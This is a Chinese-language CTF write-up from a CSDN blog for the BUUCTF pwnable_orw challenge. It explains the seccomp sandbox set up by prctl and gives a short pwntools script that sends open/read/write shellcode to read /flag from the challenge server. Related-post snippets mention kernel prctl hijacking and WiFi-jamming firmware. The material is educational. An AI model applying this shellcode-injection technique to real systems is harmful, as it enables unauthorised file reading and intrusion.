[PWN]pwnable_orw prctl()函数

看海就会失去海

于 2023-09-16 19:09:12 发布

阅读量142

点赞数

文章标签： python 系统安全

本文链接：https://blog.csdn.net/weixin_55700752/article/details/132922297

版权

题目位于BUUCTF

main函数：
在这里插入图片描述
orw_seccomp函数：

prctl-seccomp： seccomp相当于内核中的一种安全机制，正常情况下，程序可以使用所有的syscall，但是当劫持程序流程之后通过 exeve 来执行 syscall 得到 shell 时 seccomp便派上了用场，可以过滤掉某些 syscall，只允许使用部分 syscall。

prctl两句函数的作用是

禁止程序提升权限，并且禁止除open、write、read函数外的系统调用使用

利用流程如下：

利用open系统调用打开flag文件
read系统调用读取内容
write函数打印内容

利用pwntools工具生成shellcode如下：

from pwn import *
p = remote("node4.buuoj.cn",28046)
shellcode = shellcraft.open('/flag')
shellcode += shellcraft.read('eax','esp',100)
shellcode += shellcraft.write(1,'esp',100)
shellcode = asm(shellcode)
p.sendline(shellcode)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

看海就会失去海

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
4
评论
[PWN]pwnable_orw prctl()函数

BUUCTF pwn prctl-seccomp
复制链接

扫一扫

pwn入门-buu第二页题解(32道)（持续更新中），一起刷完了这份1307页的网络安全面试宝典吧

m0_61068496的博客

04-06

561

有print(format),格式化字符串漏洞啊.那么有什么用呢?别急接着往下看看到vuln函数可以栈溢出,哎,但是这个v2 = __readfsqword(0x28u)是什么意思呢?

BUUCTF：pwnable_orw

qq_44768749的博客

08-27

1516

BUUCTF：pwnable_orw0x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 32位程序，开启了canary保护 0x02 运行提示输入shellcode 0x03 IDA main函数调用orw_seccomp函数后，输入shellcode后执行shellcode 写入sys_call的shellcode，发现不能执行 orw_seccomp函数 seccomp 是 secure computing 的缩写，其是

4 条评论您还未登录，请先登录后发表或查看评论

linux kernel pwn学习之hijack prctl

seaaseesa的博客

03-06

1657

Hijack prctl Prctl是linux的一个函数，可以对进程、线程做一些设置，prctl内部通过虚表来调用对应的功能，如果我们劫持prctl的虚表，使它指向其他对我们有帮助的内核函数，比如call_usermodehelper函数，该函数执行一个用户传入的二进制文件，且以root权限执行，由此可以利用起来提权。我们分析一下prctl源码，在linux/kernel/sys.c里，我...

pwnable_orw-seccomp沙箱

个人笔记

04-11

698

但是，并不是所有的系统调用都被需要，而且不安全的代码滥用系统调用会对系统造成安全威胁。seccomp安全机制能使一个进程进入到一种“安全”运行模式，该模式下的进程只能调用4种系统调用（system call），即 read(), write(), exit() 和 sigreturn()，否则进程便会被终止。还能调用o(open)/r(read)/w(write)功能，题目orw的提示就是这样来的！输出flag文件内容，sys_write(1,file,0x30)；手动生成读取文件shellcode。

pwnable_orw

m0_58426698的博客

03-21

334

pwn的最经典的orw的题目，顺便学了一下手写汇编，对传参有了更深的理解

【PWN刷题】Pwnable-Start、Pwnable-orw

QYbudong的博客

05-03

1400

③思路：打开文件sys_open('/home/orw/flag',0,0)，读取文件sys_read(3,flag,0x100)，写入标准输出sys_write(1,flag,0x30)。当然也可以用上边所说的，自己写汇编然后用asm生成shellcode，这种比较标准的函数还是建议用shellcraft，比较方便。这里解释一下，0x68732f6e和0x69622f2f组合在一起是hs/nib//，也就是binsh的小端序写法；而0xb，也就是11，是execve的系统调用号。入门级题目，保护全关。

pwnable_kr:壳牌我们玩游戏吗？

05-14

Pwnable.kr 此仓库将保存我对pwnable.kr wargames的解决方案 [婴儿奶瓶] fd 碰撞转炉旗帜密码随机的输入腿错误炮击硬币1 二十一点乐透命令1 命令2 af 码图 Memcpy 汇编取消连结 ...

Wi-PWN_8.0_ENGLISH.bin

08-25

ESP8266的WIFI杀手固件，这是不带显示的。我后续更新带OLED显示的固件。教程后将更新。

Wi-PWN_8.0_ENGLISH_OLED.bin

08-25

这是ESP8266的带OLED显示的WIFI杀手固件。

PWN.zip_PWN控制舵机_pwn控制_pwn控制h桥_数字舵机_电机

07-14

pwm波输出，实现数字舵机的控制，完成一些简单的电机控制问题

PWM.zip_PWM脉冲发生器_pwn proteus_单片机 pwn_脉冲仿真_脉冲发生器PWM

09-24

单片机脉冲发生器pwn,有proteus仿真图，及c代码

BUUCTF pwnable_orw WP

weixin_44645415的博客

08-18

316

限制系统调用&&shellcode 1，文件分析 checksec Arch: i386-32-little RELRO: Partial RELRO Stack: Canary found NX: NX disabled PIE: No PIE (0x8048000) RWX: Has RWX segments 有canary保护，但是又有存在RWX权限的段，可以考虑写入shellcod

[BUUCTF]PWN——pwnable_orw

mcmuyanga的博客

11-10

1834

pwnable_orw 附件步骤：例行检查，32位程序，开启了canary 本地运行一下程序，看看大概的情况，提示我们输入shellcode 32位ida载入，检索字符串，没看见什么可以直接利用的，直接看main函数 orw_seccomp函数 prctl在百度后知道了是沙盒机制，具体的看这篇文章 prctl seccomp相当于内核中的一种安全机制，正常情况下，程序可以使用所有的syscall，但是当劫持程序流程之后通过exeve来呼叫syscall得到shell时seccomp边

BUUCTF pwn——pwnable_orw

CNS-Enterprise BCC-1701-J

05-06

172

BUUCTF 做题练习

pwn -- 沙盒机制详解

lifanxin的博客

05-13

6334

沙盒机制详解概述开启沙盒的两种方式prctl函数调用seccomp库函数使用seccomp-tools识别沙盒两道例题pwnable_asm参考博客总结概述沙盒机制也就是我们常说的沙箱，英文名sandbox，是计算机领域的虚拟技术，常见于安全方向。一般说来，我们会将不受信任的软件放在沙箱中运行，一旦该软件有恶意行为，则禁止该程序的进一步运行，不会对真实系统造成任何危害。在ctf比赛中，pwn题中的沙盒一般都会限制execve的系统调用，这样一来one_gadget和system调用都不好使，只

./pwn1_sctf_2016: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory

“相关推荐”对你有帮助么？

非常没帮助
没帮助
一般
有帮助
非常有帮助

提交